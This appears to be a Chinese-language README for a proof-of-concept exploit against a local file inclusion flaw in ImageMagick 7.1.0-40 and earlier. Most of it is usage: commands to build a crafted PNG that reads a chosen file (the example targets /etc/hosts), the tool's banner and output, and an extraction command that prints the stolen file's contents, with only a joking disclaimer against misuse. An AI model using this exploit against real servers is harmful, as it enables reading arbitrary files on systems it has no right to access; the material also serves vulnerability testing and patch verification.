ImageMagick 是一个免费开源的跨平台软件套件,用于显示、转换和编辑光栅图像和矢量图像文件。它可以读写超过200种图像文件格式。ImageMagick 遵循 Apache License 2.0 许可证。它以命令行工具、C API 和一组 C++ 类的形式提供。维基百科
ImageMagick 7.1.0-40 及更低版本存在一个本地文件包含漏洞。该漏洞是由于对用户提供的输入验证不当造成的。攻击者可以通过向目标发送特制的 PNG 文件来利用此漏洞。成功利用此漏洞可能允许攻击者读取目标系统上的任意文件。
致谢发现此漏洞的研究人员:
制作恶意 PNG 以利用 ImageMagick 7.1.0-40:
pip install Pillow)使用 generate.py 制作 PNG:
python3 generate.py -i input.png -f "/etc/hosts" -o exploit.png
______ __ _____ ______
| _ \ \ / / | __ \ | ____|
| |_) \ \_/ / | |__) |__ __ _ ______| |__ _ __ ___ __ _
| _ < \ / | ___/ _ \ / _` |______| __| '__/ _ \ / _` |
| |_) | | | | | | (_) | (_| | | | | | | (_) | (_| |
|____/ |_| |_| \___/ \__, | |_| |_| \___/ \__, |
__/ | __/ |
|___/ |___/
[*] ImageMagick LFI Exploit
[*] Embedding Payload to read the target file
[*] Exploit PNG generated: exploit.png
python3 extract.py downloaded_img.png
127.0.0.1 localhost
::1 localhost ip6-localhost ip6-loopback
ff02::1 ip6-allnodes
ff02::2 ip6-allrouters
免责声明:请做个好孩子,不要将其用于不良行为。